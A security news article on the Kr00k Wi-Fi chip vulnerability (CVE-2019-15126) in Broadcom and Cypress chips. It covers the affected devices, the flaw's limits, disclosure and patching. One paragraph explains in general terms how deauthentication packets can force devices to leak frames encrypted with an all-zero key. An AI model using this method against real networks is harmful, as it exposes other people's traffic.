A new hardware vulnerability present in the Wi-Fi chips manufactured by Broadcom and Cypress were discovered by security researchers. These Wi-Fi chips were used for powering more than a billion devices that includes smartphones, tablets, laptops, routers, IoT gadgets etc.
The high-severity vulnerability has been dubbed ‘Kr00k’ and tracked as CVE-2019-15126. This flaw lets any nearby remote attackers to intercept and decrypt wireless network packets transmitted over-the-air by a vulnerable device.
The attacker need not have to be connected to the victim’s wireless network and the vulnerability works against vulnerable devices using WPA2-Personal or WPA2-Enterprise protocols, with AES-CCMP encryption, to protect their network traffic.
The ESET researcher stated that their tests confirmed some client devices by Amazon (Echo, Kindle), Apple (iPhone, iPad, MacBook), Google (Nexus), Samsung (Galaxy), Raspberry (Pi 3), Xiaomi (RedMi), and also some access points by Asus and Huawei, were vulnerable to Kr00k.
The Kr00k flaw is related to the KRACK attack which is a technique used by hackers to hack Wi-Fi passwords protected using a widely-used WPA2 network protocol.
Let us look at some points that is to be noted
- The vulnerability does not reside in the Wi-Fi encryption protocol, but it exists in the way vulnerable chips implemented the encryption.
- It does not allow attackers connect to your Wi-Fi network and launch further man-in-the-middle attacks or exploitation against other connected devices.
- It does not let attackers get your Wi-Fi password.
- It does not affect modern devices using the latest Wi-Fi security standard, which is WPA3 protocol.
- It allows the attackers capture and decrypt some wireless packets.
- The flaw breaks encryption on the wireless layer but has nothing to do with TLS encryption that still secures the network traffic with sites using HTTPS.
Kr00k Attack and its working
When a device suddenly gets disconnected from the wireless network, the Wi-Fi chip clears the session key in the memory and set it to zero, but the chip inadvertently transmits all data frames left in the buffer with an all-zero encryption key even after the disassociation.
So, an attacker who is in near proximity to vulnerable devices can use this flaw to repeatedly trigger disassociations by sending deauthentication packets over the air to capture more data frames, “potentially containing sensitive data, including DNS, ARP, ICMP, HTTP, TCP, and TLS packets.”
Also, as the flaw also affects chips embedded in many wireless routers, the issue also lets the attackers to intercept and decrypt network traffic transmitted from connected devices that are not vulnerable to Kr00k, either patched or using different Wi-Fi chips.
The researchers have reported this issue to both affected chip manufacturers, Broadcom and Cypress, last year, besides many affected device manufacturers.
Apple has already released patches while other vendors are still testing the issue against their devices.